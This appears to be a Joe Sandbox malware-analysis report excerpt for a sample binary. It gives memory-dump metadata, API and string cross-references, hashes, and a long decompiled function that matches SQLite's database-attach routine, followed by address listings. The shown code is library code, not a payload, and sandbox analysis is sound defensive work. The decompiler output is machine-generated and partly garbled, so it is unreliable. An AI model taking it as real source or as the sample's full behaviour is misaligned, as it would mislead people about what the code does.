0x00e94268
0x00e94272
0x00e94277
0x00e9427d
0x00e94282
0x00e94282

APIs

GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00E94355,?,?,00000000), ref: 00E941A6
_free.LIBCMT ref: 00E94194

Part of subcall function 00E8EC89: HeapFree.KERNEL32(00000000,00000000,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?), ref: 00E8EC9F
Part of subcall function 00E8EC89: GetLastError.KERNEL32(?,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?,?), ref: 00E8ECB1

_free.LIBCMT ref: 00E9435E

Strings

]C, xrefs: 00E9414F, 00E94260, 00E94155
UC, xrefs: 00E93EE2, 00E93E9D, 00E93F78, 00E93FD3, 00E94007, 00E9413E

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: UC$]C
API String ID: 2155170405-489982250
Opcode ID: 6f2d18d1a50362209b4af9f96770b442273cdd1fd490235106b79357de1610bc
Instruction ID: ee7b05eae2f6aff8c4bfacc01b4580b7dce40a94bead5cd994811e1c7c58bbb7
Opcode Fuzzy Hash: 6f2d18d1a50362209b4af9f96770b442273cdd1fd490235106b79357de1610bc
Instruction Fuzzy Hash: B851C8B1901224AFCF10BB75EC05D9E7BB9EF41354F105166F414B72A1EB709E458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00DD89E0 Relevance: 8.0, Strings: 6, Instructions: 527
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E00DD89E0(intOrPtr* _a4, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr* _t200;
				intOrPtr _t207;
				signed int _t217;
				signed int* _t222;
				signed int _t223;
				signed int _t226;
				signed int _t236;
				intOrPtr _t239;
				signed int _t252;
				signed int _t253;
				intOrPtr* _t254;
				void* _t256;
				signed int _t258;
				signed int _t262;
				signed int _t263;
				signed int _t267;
				signed int _t268;
				signed int _t272;
				void* _t274;
				signed int _t278;
				signed int _t280;
				signed int* _t281;
				unsigned int _t282;
				signed int _t284;
				signed int* _t285;
				void* _t286;
				signed char _t287;
				intOrPtr* _t288;
				intOrPtr _t289;
				intOrPtr _t291;
				signed int _t295;
				signed int _t296;
				signed int _t304;
				signed int _t309;
				signed int _t311;
				intOrPtr _t318;
				signed int _t319;
				intOrPtr _t321;
				signed int _t327;
				signed char _t334;
				signed char _t336;
				char _t341;
				intOrPtr* _t347;
				void* _t348;
				void* _t349;
				intOrPtr _t351;
				signed int _t353;
				signed int _t355;
				void* _t356;
				signed int _t358;
				signed int _t360;
				intOrPtr* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				void* _t367;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				void* _t372;

				_t371 = (_t369 & 0xfffffff8) - 0x34;
				_t198 =  *0xed8944; // 0xccebfc3b
				_v8 = _t198 ^ _t371;
				_t200 = _a4;
				_t288 = _a12;
				_v32 = _t200;
				_t272 = 0;
				_v36 = _t288;
				_t289 =  *_t288;
				_v20 = 0;
				_v24 = 0;
				_t347 =  *((intOrPtr*)( *_t200 + 0x20));
				_v12 = 0;
				if(_t289 != 0) {
					_t334 =  *(_t289 + 8) & 0x0000ffff;
					__eflags = (_t334 & 0x00000202) - 0x202;
					if((_t334 & 0x00000202) != 0x202) {
						L5:
						__eflags = _t334 & 0x00000001;
						if((_t334 & 0x00000001) == 0) {
							_t351 = E00DB58E0(1, _t347);
						} else {
							_t351 = 0;
						}
					} else {
						__eflags =  *((char*)(_t289 + 0xa)) - 1;
						if( *((char*)(_t289 + 0xa)) != 1) {
							goto L5;
						} else {
							_t351 =  *((intOrPtr*)(_t289 + 0x10));
						}
					}
				} else {
					_t351 = 0;
				}
				_t291 =  *((intOrPtr*)(_v36 + 4));
				if(_t291 != 0) {
					_t336 =  *(_t291 + 8) & 0x0000ffff;
					__eflags = (_t336 & 0x00000202) - 0x202;
					if((_t336 & 0x00000202) != 0x202) {
						L13:
						__eflags = _t336 & 0x00000001;
						if((_t336 & 0x00000001) == 0) {
							_t207 = E00DB58E0(1, _t347);
						} else {
							_t207 = 0;
						}
					} else {
						__eflags =  *((char*)(_t291 + 0xa)) - 1;
						if( *((char*)(_t291 + 0xa)) != 1) {
							goto L13;
						} else {
							_t207 =  *((intOrPtr*)(_t291 + 0x10));
						}
					}
				} else {
					_t207 = 0;
				}
				_t338 =  *(_t347 + 0x14);
				_t293 =  !=  ? _t351 : 0xec5dd4;
				_v36 =  !=  ? _t351 : 0xec5dd4;
				_t294 =  *((intOrPtr*)(_t347 + 0x80));
				_t353 =  !=  ? _t207 : 0xec5dd4;
				_v40 = 0xec5dd4;
				if(_t338 <  *((intOrPtr*)(_t347 + 0x80)) + 2) {
					_t295 = 0;
					_v44 = 0;
					__eflags = _t338;
					if(_t338 <= 0) {
						L26:
						_t296 =  *(_t347 + 0x10);
						__eflags = _t296 - _t347 + 0x190;
						if(_t296 != _t347 + 0x190) {
							_t355 = _t338 + 1 << 4;
							__eflags = _t296;
							if(_t296 != 0) {
								__eflags = _t296 -  *((intOrPtr*)(_t347 + 0x128));
								if(_t296 <  *((intOrPtr*)(_t347 + 0x128))) {
									L37:
									_t338 = _t296;
									_t210 = E00D954E0(_t296, _t355, 0);
									goto L38;
								} else {
									__eflags = _t296 -  *((intOrPtr*)(_t347 + 0x12c));
									if(_t296 >=  *((intOrPtr*)(_t347 + 0x12c))) {
										goto L37;
									} else {
										_t258 =  *(_t347 + 0x10c) & 0x0000ffff;
										asm("cdq");
										__eflags = 0 - _t338;
										if(__eflags > 0) {
											goto L37;
										} else {
											if(__eflags < 0) {
												goto L39;
											} else {
												__eflags = _t355 - _t258;
												if(_t355 <= _t258) {
													goto L39;
												} else {
													goto L37;
												}
											}
										}
									}
								}
							} else {
								_t210 = E00D95440(_t338, _t355, 0);
								L38:
								_t296 = _t210;
								_t371 = _t371 + 8;
								__eflags = _t296;
								if(_t296 == 0) {
									goto L127;
								} else {
									goto L39;
								}
							}
						} else {
							_t296 = E00D95440(_t338, 0x30, 0);
							_t371 = _t371 + 8;
							__eflags = _t296;
							if(_t296 == 0) {
								goto L127;
							} else {
								asm("movups xmm0, [eax]");
								asm("movups [ecx], xmm0");
								asm("movups xmm0, [eax+0x10]");
								asm("movups [ecx+0x10], xmm0");
								L39:
								asm("xorps xmm0, xmm0");
								_t277 = ( *(_t347 + 0x14) << 4) + _t296;
								 *(_t347 + 0x10) = _t296;
								_v48 = ( *(_t347 + 0x14) << 4) + _t296;
								asm("movups [ebx], xmm0");
								_v44 =  *((intOrPtr*)(_t347 + 0x34));
								_t217 = E00E214C0( *((intOrPtr*)( *_t347 + 0x10)), _v36,  &_v44,  &_v28,  &_v20,  &_v24);
								_t372 = _t371 + 0x10;
								__eflags = _t217;
								if(_t217 == 0) {
									_t338 = _v20;
									_v44 = _v44 | 0x00000100;
									_t278 = E00DA8A80(_v28, _v20, _t347, _t277 + 4, 0, _v44 | 0x00000100);
									_v52 = _t278;
									E00D95050(_v20);
									 *(_t347 + 0x14) =  *(_t347 + 0x14) + 1;
									_t371 = _t372 + 0x14;
									 *((char*)(_t347 + 0x51)) = 0;
									__eflags = _t278 - 0x13;
									if(_t278 != 0x13) {
										__eflags = _t278;
										if(_t278 == 0) {
											_t281 = _v48;
											_t236 = E00DE3190(_t347,  *((intOrPtr*)(_t281 + 4)));
											 *(_t281 + 0xc) = _t236;
											__eflags = _t236;
											if(_t236 != 0) {
												__eflags =  *((char*)(_t236 + 0x4c));
												if( *((char*)(_t236 + 0x4c)) != 0) {
													__eflags =  *((intOrPtr*)(_t236 + 0x4d)) -  *((intOrPtr*)(_t347 + 0x46));
													if( *((intOrPtr*)(_t236 + 0x4d)) !=  *((intOrPtr*)(_t347 + 0x46))) {
														_push("attached databases must use the same text encoding as main database");
														_push(_t347);
														_t252 = E00D97470();
														_t371 = _t371 + 8;
														_v12 = _t252;
														_v52 = 1;
													}
												}
											} else {
												_v52 = 7;
											}
											_t318 =  *((intOrPtr*)(_t281 + 4));
											__eflags =  *((char*)(_t318 + 9));
											if( *((char*)(_t318 + 9)) != 0) {
												 *((intOrPtr*)(_t318 + 0xc)) =  *((intOrPtr*)(_t318 + 0xc)) + 1;
												__eflags =  *((char*)(_t318 + 0xa));
												if( *((char*)(_t318 + 0xa)) == 0) {
													E00DA6D30(_t318);
												}
											}
											_t341 =  *((intOrPtr*)(_t347 + 0x4b));
											_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 4))));
											__eflags =  *((char*)(_t239 + 0xc));
											if( *((char*)(_t239 + 0xc)) == 0) {
												_t327 =  *(_t239 + 0xd4);
												__eflags = _t327;
												if(_t327 == 0) {
													L61:
													 *((char*)(_t239 + 4)) = _t341;
												} else {
													__eflags =  *((char*)(_t327 + 0x2b)) - 2;
													if( *((char*)(_t327 + 0x2b)) != 2) {
														goto L61;
													}
												}
											}
											_t363 =  *( *(_t347 + 0x10) + 4);
											__eflags = _t363;
											if(_t363 != 0) {
												_t319 =  *((intOrPtr*)(_t363 + 9));
												__eflags = _t319;
												if(_t319 != 0) {
													 *(_t363 + 0xc) =  *(_t363 + 0xc) + 1;
													__eflags =  *((char*)(_t363 + 0xa));
													if( *((char*)(_t363 + 0xa)) == 0) {
														E00DA6D30(_t363);
														_t319 =  *((intOrPtr*)(_t363 + 9));
													}
												}
												_t282 =  *( *((intOrPtr*)(_t363 + 4)) + 0x16) & 0x0000ffff;
												__eflags = _t319;
												if(_t319 != 0) {
													_t116 = _t363 + 0xc;
													 *_t116 =  *(_t363 + 0xc) + 0xffffffff;
													__eflags =  *_t116;
													if( *_t116 == 0) {
														E00DA6CF0(_t363);
													}
												}
												_t284 = _t282 >> 0x00000002 & 0x00000003;
												__eflags = _t284;
											} else {
												_t284 = 0;
											}
											_t365 = _v48[1];
											__eflags = _t365;
											if(_t365 != 0) {
												__eflags =  *((char*)(_t365 + 9));
												if( *((char*)(_t365 + 9)) != 0) {
													 *(_t365 + 0xc) =  *(_t365 + 0xc) + 1;
													__eflags =  *((char*)(_t365 + 0xa));
													if( *((char*)(_t365 + 0xa)) == 0) {
														E00DA6D30(_t365);
													}
												}
												 *( *((intOrPtr*)(_t365 + 4)) + 0x16) =  *( *((intOrPtr*)(_t365 + 4)) + 0x16) & 0x0000fff3;
												 *( *((intOrPtr*)(_t365 + 4)) + 0x16) =  *( *((intOrPtr*)(_t365 + 4)) + 0x16) | _t284 * 0x00000004;
												__eflags =  *((char*)(_t365 + 9));
												if( *((char*)(_t365 + 9)) != 0) {
													_t132 = _t365 + 0xc;
													 *_t132 =  *(_t365 + 0xc) + 0xffffffff;
													__eflags =  *_t132;
													if( *_t132 == 0) {
														E00DA6CF0(_t365);
													}
												}
											}
											_t285 = _v48;
											_t338 =  *(_t347 + 0x1c) & 0x00000038 | 0x00000003;
											E00DA94C0( *((intOrPtr*)(_t285 + 4)),  *(_t347 + 0x1c) & 0x00000038 | 0x00000003);
											_t321 =  *((intOrPtr*)(_t285 + 4));
											__eflags =  *((char*)(_t321 + 9));
											if( *((char*)(_t321 + 9)) != 0) {
												_t139 = _t321 + 0xc;
												 *_t139 =  *(_t321 + 0xc) + 0xffffffff;
												__eflags =  *_t139;
												if( *_t139 == 0) {
													E00DA6CF0(_t321);
												}
											}
											_t278 = _v52;
										}
									} else {
										_push("database is already attached");
										_t278 = 1;
										_push(_t347);
										_v52 = 1;
										_t253 = E00D97470();
										_t371 = _t371 + 8;
										_v12 = _t253;
									}
									_t222 = _v48;
									_t304 = _v40;
									_t222[2] = 3;
									__eflags = _t304;
									if(_t304 != 0) {
										_t338 = _t304 + 1;
										do {
											_t223 =  *_t304;
											_t304 = _t304 + 1;
											__eflags = _t223;
										} while (_t223 != 0);
										_v16 = _t304 - _t338 + 1;
										_t358 = E00D95440(_t338, _t304 - _t338 + 1, 0);
										_t371 = _t371 + 8;
										__eflags = _t358;
										if(_t358 != 0) {
											L00E79650(_t358, _v40, _v16);
											_t371 = _t371 + 0xc;
										}
										_t222 = _v48;
									} else {
										_t358 = 0;
									}
									 *_t222 = _t358;
									__eflags = _t278;
									if(_t278 != 0) {
										L97:
										_t226 =  *(_t347 + 0x10);
										_t280 =  *(_t347 + 0x14) - 1;
										_t360 = _t280 + _t280;
										_t307 =  *(_t226 + 4 + _t360 * 8);
										__eflags =  *(_t226 + 4 + _t360 * 8);
										if( *(_t226 + 4 + _t360 * 8) != 0) {
											E00DA9210(_t307);
											 *((intOrPtr*)( *(_t347 + 0x10) + 4 + _t360 * 8)) = 0;
											 *((intOrPtr*)( *(_t347 + 0x10) + 0xc + _t360 * 8)) = 0;
										}
										E00DDA9E0(_t347);
										 *(_t347 + 0x14) = _t280;
										_t272 = _v52;
										__eflags = _t272 - 7;
										if(_t272 == 7) {
											L103:
											__eflags =  *((char*)(_t347 + 0x49));
											if( *((char*)(_t347 + 0x49)) == 0) {
												__eflags =  *((char*)(_t347 + 0x4a));
												if( *((char*)(_t347 + 0x4a)) == 0) {
													__eflags =  *(_t347 + 0xac);
													 *((char*)(_t347 + 0x49)) = 1;
													if( *(_t347 + 0xac) > 0) {
														 *(_t347 + 0x100) = 1;
													}
													_t178 = _t347 + 0x108;
													 *_t178 =  *(_t347 + 0x108) + 1;
													__eflags =  *_t178;
												}
											}
											_t309 = _v12;
											__eflags = _t309;
											if(_t309 != 0) {
												__eflags =  *(_t347 + 0x1d0);
												if( *(_t347 + 0x1d0) == 0) {
													__eflags = _t309 -  *((intOrPtr*)(_t347 + 0x128));
													if(_t309 <  *((intOrPtr*)(_t347 + 0x128))) {
														L114:
														E00D95050(_t309);
														_t371 = _t371 + 4;
													} else {
														__eflags = _t309 -  *((intOrPtr*)(_t347 + 0x12c));
														if(_t309 >=  *((intOrPtr*)(_t347 + 0x12c))) {
															goto L114;
														} else {
															 *_t309 =  *(_t347 + 0x124);
															 *(_t347 + 0x124) = _t309;
														}
													}
												} else {
													_t338 = _t309;
													E00D950C0(_t347, _t309);
												}
											}
											_push("out of memory");
											_push(_t347);
											_t210 = E00D97470();
											_t371 = _t371 + 8;
											goto L116;
										} else {
											__eflags = _t272 - 0xc0a;
											if(_t272 == 0xc0a) {
												goto L103;
											} else {
												_t210 = _v12;
												__eflags = _t210;
												if(_t210 != 0) {
													goto L117;
												} else {
													_t210 = E00D97470(_t347, "unable to open database: %s", _v36);
													_t371 = _t371 + 0xc;
													goto L116;
												}
											}
										}
										goto L125;
									} else {
										__eflags = _t358;
										if(_t358 != 0) {
											__eflags =  *((char*)(_t347 + 0x51));
											if( *((char*)(_t347 + 0x51)) == 0) {
												E00DA6DF0(_t347);
											}
											_t338 =  &_v12;
											_t210 = E00DF7930(_t347,  &_v12);
											__eflags =  *((char*)(_t347 + 0x51));
											_t362 = _t210;
											_v52 = _t362;
											if( *((char*)(_t347 + 0x51)) == 0) {
												_t210 = L00DA6E40(_t347);
											}
											__eflags = _t362;
											if(_t362 != 0) {
												goto L97;
											}
										} else {
											_v52 = 7;
											goto L97;
										}
									}
									goto L127;
								} else {
									__eflags = _t217 - 7;
									if(_t217 == 7) {
										__eflags =  *((char*)(_t347 + 0x49));
										if( *((char*)(_t347 + 0x49)) == 0) {
											__eflags =  *((char*)(_t347 + 0x4a));
											if( *((char*)(_t347 + 0x4a)) == 0) {
												_t68 = _t347 + 0x108;
												 *_t68 =  *(_t347 + 0x108) + 1;
												__eflags =  *_t68;
											}
										}
									}
									_t254 = _v32;
									 *(_t254 + 0x14) = 1;
									 *((char*)(_t254 + 0x19)) = 1;
									E00DB5560( *_t254, _v24, 0xffffffff, 1, 0xffffffff);
									_t256 = E00D95050(_v24);
									_pop(_t349);
									_pop(_t367);
									_pop(_t286);
									__eflags = _v8 ^ _t372 + 0x10;
									return E00E76672(_t256, _t286, _v8 ^ _t372 + 0x10, _v24, _t349, _t367);
								}
							}
						}
					} else {
						_v52 =  *(( *0xec5dd4 & 0x000000ff) + 0xecc550) & 0x000000ff;
						_t262 =  *(_t347 + 0x10);
						_v48 = _t262;
						do {
							_t338 =  *_t262;
							_t287 =  *_t338;
							_t263 = _t287 & 0x000000ff;
							__eflags = ( *(_t263 + 0xecc550) & 0x000000ff) != _v52;
							if(( *(_t263 + 0xecc550) & 0x000000ff) != _v52) {
								goto L25;
							} else {
								_t368 = _t353 - _t338;
								__eflags = _t368;
								while(1) {
									__eflags = _t287;
									if(_t287 == 0) {
										_t210 = E00D97470(_t347, "database %s is already in use", _v40);
										_t371 = _t371 + 0xc;
										_t272 = 0;
										goto L116;
									}
									_t35 = _t338 + 1; // 0x4e000000
									_t267 =  *(_t368 + _t35) & 0x000000ff;
									_t338 = _t338 + 1;
									_t287 =  *_t338;
									_t268 = _t287 & 0x000000ff;
									__eflags = ( *(_t268 + 0xecc550) & 0x000000ff) == ( *(_t267 + 0xecc550) & 0x000000ff);
									if(( *(_t268 + 0xecc550) & 0x000000ff) == ( *(_t267 + 0xecc550) & 0x000000ff)) {
										continue;
									} else {
										_t295 = _v44;
										_t353 = _v40;
										goto L25;
									}
									goto L128;
								}
								goto L116;
							}
							goto L128;
							L25:
							_t295 = _t295 + 1;
							_t338 =  *(_t347 + 0x14);
							_t262 =  &(_v48[4]);
							_v44 = _t295;
							_v48 = _t262;
							__eflags = _t295 - _t338;
						} while (_t295 < _t338);
						goto L26;
					}
				} else {
					_t210 = E00D97470(_t347, "too many attached databases - max %d", _t294);
					_t371 = _t371 + 0xc;
					L116:
					_v12 = _t210;
					if(_t210 == 0) {
						_t361 = _v32;
					} else {
						L117:
						_t361 = _v32;
						_t338 = _t210;
						 *(_t361 + 0x14) = 1;
						 *((char*)(_t361 + 0x19)) = 1;
						_t210 = E00DB5560( *_t361, _t210, 0xffffffff, 1, 0xffffffff);
						_t311 = _v12;
						_t371 = _t371 + 0xc;
						if(_t311 != 0) {
							if( *(_t347 + 0x1d0) == 0) {
								__eflags = _t311 -  *((intOrPtr*)(_t347 + 0x128));
								if(_t311 <  *((intOrPtr*)(_t347 + 0x128))) {
									L123:
									_t210 = E00D95050(_t311);
									_t371 = _t371 + 4;
								} else {
									__eflags = _t311 -  *((intOrPtr*)(_t347 + 0x12c));
									if(_t311 >=  *((intOrPtr*)(_t347 + 0x12c))) {
										goto L123;
									} else {
										_t210 =  *(_t347 + 0x124);
										 *_t311 =  *(_t347 + 0x124);
										 *(_t347 + 0x124) = _t311;
									}
								}
							} else {
								_t338 = _t311;
								_t210 = E00D950C0(_t347, _t311);
							}
						}
					}
					L125:
					if(_t272 != 0) {
						_t210 = E00DBBC40(_t361, _t272);
						_t371 = _t371 + 8;
					}
					L127:
					_pop(_t348);
					_pop(_t356);
					_pop(_t274);
					return E00E76672(_t210, _t274, _v8 ^ _t371, _t338, _t348, _t356);
				}
				L128:
			}

0x00dd89e6
0x00dd89e9
0x00dd89f0
0x00dd89f4
0x00dd89f7
0x00dd89fb
0x00dd89ff
0x00dd8a04
0x00dd8a08
0x00dd8a0a
0x00dd8a0e
0x00dd8a13
0x00dd8a16
0x00dd8a1c
0x00dd8a22
0x00dd8a2d
0x00dd8a32
0x00dd8a3f
0x00dd8a3f
0x00dd8a42
0x00dd8a4f
0x00dd8a44
0x00dd8a44
0x00dd8a44
0x00dd8a34
0x00dd8a34
0x00dd8a38
0x00000000
0x00dd8a3a
0x00dd8a3a
0x00dd8a3a
0x00dd8a38
0x00dd8a1e
0x00dd8a1e
0x00dd8a1e
0x00dd8a55
0x00dd8a5a
0x00dd8a60
0x00dd8a6b
0x00dd8a70
0x00dd8a7d
0x00dd8a7d
0x00dd8a80
0x00dd8a88
0x00dd8a82
0x00dd8a82
0x00dd8a82
0x00dd8a72
0x00dd8a72
0x00dd8a76
0x00000000
0x00dd8a78
0x00dd8a78
0x00dd8a78
0x00dd8a76
0x00dd8a5c
0x00dd8a5c
0x00dd8a5c
0x00dd8a8d
0x00dd8a97
0x00dd8a9c
0x00dd8aa5
0x00dd8aab
0x00dd8aae
0x00dd8ab7
0x00dd8acd
0x00dd8acf
0x00dd8ad3
0x00dd8ad5
0x00dd8b46
0x00dd8b46
0x00dd8b4f
0x00dd8b51
0x00dd8b9c
0x00dd8b9f
0x00dd8ba1
0x00dd8bae
0x00dd8bb4
0x00dd8bd0
0x00dd8bd1
0x00dd8bd6
0x00000000
0x00dd8bb6
0x00dd8bb6
0x00dd8bbc
0x00000000
0x00dd8bbe
0x00dd8bbe
0x00dd8bc5
0x00dd8bc6
0x00dd8bc8
0x00000000
0x00dd8bca
0x00dd8bca
0x00000000
0x00dd8bcc
0x00dd8bcc
0x00dd8bce
0x00000000
0x00000000
0x00000000
0x00000000
0x00dd8bce
0x00dd8bca
0x00dd8bc8
0x00dd8bbc
0x00dd8ba3
0x00dd8ba7
0x00dd8bdb
0x00dd8bdb
0x00dd8bdd
0x00dd8be0
0x00dd8be2
0x00000000
0x00000000
0x00000000
0x00000000
0x00dd8be2
0x00dd8b53
0x00dd8b5e
0x00dd8b60
0x00dd8b63
0x00dd8b65
0x00000000
0x00dd8b6b
0x00dd8b6e
0x00dd8b71
0x00dd8b74
0x00dd8b78
0x00dd8be8
0x00dd8beb
0x00dd8bf5
0x00dd8bf7
0x00dd8bfa
0x00dd8bfe
0x00dd8c06
0x00dd8c21
0x00dd8c26
0x00dd8c29
0x00dd8c2b
0x00dd8cb3
0x00dd8cb6
0x00dd8cbf
0x00dd8cc2
0x00dd8cc6
0x00dd8ccb
0x00dd8cce
0x00dd8cd1
0x00dd8cd5
0x00dd8cd8
0x00dd8cfa
0x00dd8cfc
0x00dd8d02
0x00dd8d0b
0x00dd8d10
0x00dd8d13
0x00dd8d15
0x00dd8d21
0x00dd8d25
0x00dd8d2a
0x00dd8d2d
0x00dd8d2f
0x00dd8d34
0x00dd8d35
0x00dd8d3a
0x00dd8d3d
0x00dd8d41
0x00dd8d41
0x00dd8d2d
0x00dd8d17
0x00dd8d17
0x00dd8d17
0x00dd8d49
0x00dd8d4c
0x00dd8d50
0x00dd8d52
0x00dd8d55
0x00dd8d59
0x00dd8d5b
0x00dd8d5b
0x00dd8d59
0x00dd8d63
0x00dd8d69
0x00dd8d6b
0x00dd8d6f
0x00dd8d71
0x00dd8d77
0x00dd8d79
0x00dd8d81
0x00dd8d81
0x00dd8d7b
0x00dd8d7b
0x00dd8d7f
0x00000000
0x00000000
0x00dd8d7f
0x00dd8d79
0x00dd8d87
0x00dd8d8a
0x00dd8d8c
0x00dd8d92
0x00dd8d95
0x00dd8d97
0x00dd8d99
0x00dd8d9c
0x00dd8da0
0x00dd8da4
0x00dd8da9
0x00dd8da9
0x00dd8da0
0x00dd8daf
0x00dd8db3
0x00dd8db5
0x00dd8db7
0x00dd8db7
0x00dd8db7
0x00dd8dbb
0x00dd8dbf
0x00dd8dbf
0x00dd8dbb
0x00dd8dc7
0x00dd8dc7
0x00dd8d8e
0x00dd8d8e
0x00dd8d8e
0x00dd8dce
0x00dd8dd1
0x00dd8dd3
0x00dd8dd5
0x00dd8dd9
0x00dd8ddb
0x00dd8dde
0x00dd8de2
0x00dd8de6
0x00dd8de6
0x00dd8de2
0x00dd8df3
0x00dd8e01
0x00dd8e05
0x00dd8e09
0x00dd8e0b
0x00dd8e0b
0x00dd8e0b
0x00dd8e0f
0x00dd8e13
0x00dd8e13
0x00dd8e0f
0x00dd8e09
0x00dd8e1b
0x00dd8e22
0x00dd8e28
0x00dd8e2d
0x00dd8e30
0x00dd8e34
0x00dd8e36
0x00dd8e36
0x00dd8e36
0x00dd8e3a
0x00dd8e3c
0x00dd8e3c
0x00dd8e3a
0x00dd8e41
0x00dd8e41
0x00dd8cda
0x00dd8cda
0x00dd8cdf
0x00dd8ce4
0x00dd8ce5
0x00dd8ce9
0x00dd8cee
0x00dd8cf1
0x00dd8cf1
0x00dd8e45
0x00dd8e49
0x00dd8e4d
0x00dd8e51
0x00dd8e53
0x00dd8e59
0x00dd8e60
0x00dd8e60
0x00dd8e62
0x00dd8e63
0x00dd8e63
0x00dd8e71
0x00dd8e7a
0x00dd8e7c
0x00dd8e7f
0x00dd8e81
0x00dd8e8c
0x00dd8e91
0x00dd8e91
0x00dd8e94
0x00dd8e55
0x00dd8e55
0x00dd8e55
0x00dd8e98
0x00dd8e9a
0x00dd8e9c
0x00dd8edf
0x00dd8ee2
0x00dd8ee5
0x00dd8ee8
0x00dd8eea
0x00dd8eee
0x00dd8ef0
0x00dd8ef2
0x00dd8efa
0x00dd8f05
0x00dd8f05
0x00dd8f0f
0x00dd8f14
0x00dd8f17
0x00dd8f1b
0x00dd8f1e
0x00dd8f4b
0x00dd8f4b
0x00dd8f4f
0x00dd8f51
0x00dd8f55
0x00dd8f57
0x00dd8f5e
0x00dd8f62
0x00dd8f64
0x00dd8f64
0x00dd8f6e
0x00dd8f6e
0x00dd8f6e
0x00dd8f6e
0x00dd8f55
0x00dd8f74
0x00dd8f78
0x00dd8f7a
0x00dd8f7c
0x00dd8f83
0x00dd8f90
0x00dd8f96
0x00dd8fb0
0x00dd8fb1
0x00dd8fb6
0x00dd8f98
0x00dd8f98
0x00dd8f9e
0x00000000
0x00dd8fa0
0x00dd8fa6
0x00dd8fa8
0x00dd8fa8
0x00dd8f9e
0x00dd8f85
0x00dd8f85
0x00dd8f89
0x00dd8f89
0x00dd8f83
0x00dd8fb9
0x00dd8fbe
0x00dd8fbf
0x00dd8fc4
0x00000000
0x00dd8f20
0x00dd8f20
0x00dd8f26
0x00000000
0x00dd8f28
0x00dd8f28
0x00dd8f2c
0x00dd8f2e
0x00000000
0x00dd8f34
0x00dd8f3e
0x00dd8f43
0x00000000
0x00dd8f43
0x00dd8f2e
0x00dd8f26
0x00000000
0x00dd8e9e
0x00dd8e9e
0x00dd8ea0
0x00dd8eac
0x00dd8eb0
0x00dd8eb4
0x00dd8eb4
0x00dd8eb9
0x00dd8ebf
0x00dd8ec4
0x00dd8ec8
0x00dd8eca
0x00dd8ece
0x00dd8ed2
0x00dd8ed2
0x00dd8ed7
0x00dd8ed9
0x00000000
0x00000000
0x00dd8ea2
0x00dd8ea2
0x00000000
0x00dd8ea2
0x00dd8ea0
0x00000000
0x00dd8c2d
0x00dd8c2d
0x00dd8c30
0x00dd8c32
0x00dd8c36
0x00dd8c38
0x00dd8c3c
0x00dd8c55
0x00dd8c55
0x00dd8c55
0x00dd8c55
0x00dd8c3c
0x00dd8c36
0x00dd8c5b
0x00dd8c6d
0x00dd8c74
0x00dd8c78
0x00dd8c81
0x00dd8c89
0x00dd8c8a
0x00dd8c8b
0x00dd8c90
0x00dd8c9a
0x00dd8c9a
0x00dd8c2b
0x00dd8b65
0x00dd8ad7
0x00dd8ae1
0x00dd8ae5
0x00dd8ae8
0x00dd8af0
0x00dd8af0
0x00dd8af2
0x00dd8af4
0x00dd8afe
0x00dd8b02
0x00000000
0x00dd8b04
0x00dd8b04
0x00dd8b04
0x00dd8b06
0x00dd8b06
0x00dd8b08
0x00dd8b88
0x00dd8b8d
0x00dd8b90
0x00dd8b92
0x00dd8b92
0x00dd8b0a
0x00dd8b0a
0x00dd8b0f
0x00dd8b17
0x00dd8b19
0x00dd8b23
0x00dd8b25
0x00000000
0x00dd8b27
0x00dd8b27
0x00dd8b2b
0x00000000
0x00dd8b2b
0x00000000
0x00dd8b25
0x00000000
0x00dd8b06
0x00000000
0x00dd8b2f
0x00dd8b33
0x00dd8b34
0x00dd8b37
0x00dd8b3a
0x00dd8b3e
0x00dd8b42
0x00dd8b42
0x00000000
0x00dd8af0
0x00dd8ab9
0x00dd8ac0
0x00dd8ac5
0x00dd8fc7
0x00dd8fc7
0x00dd8fcd
0x00dd9037
0x00dd8fcf
0x00dd8fcf
0x00dd8fcf
0x00dd8fd3
0x00dd8fdd
0x00dd8fe4
0x00dd8fe8
0x00dd8fed
0x00dd8ff1
0x00dd8ff6
0x00dd8fff
0x00dd900c
0x00dd9012
0x00dd902c
0x00dd902d
0x00dd9032
0x00dd9014
0x00dd9014
0x00dd901a
0x00000000
0x00dd901c
0x00dd901c
0x00dd9022
0x00dd9024
0x00dd9024
0x00dd901a
0x00dd9001
0x00dd9001
0x00dd9005
0x00dd9005
0x00dd8fff
0x00dd8ff6
0x00dd903b
0x00dd903d
0x00dd9041
0x00dd9046
0x00dd9046
0x00dd9049
0x00dd904d
0x00dd904e
0x00dd904f
0x00dd905a
0x00dd905a
0x00000000

Strings

database is already attached, xrefs: 00DD8CDA
unable to open database: %s, xrefs: 00DD8F38
out of memory, xrefs: 00DD8FB9
database %s is already in use, xrefs: 00DD8B82
too many attached databases - max %d, xrefs: 00DD8ABA
attached databases must use the same text encoding as main database, xrefs: 00DD8D2F

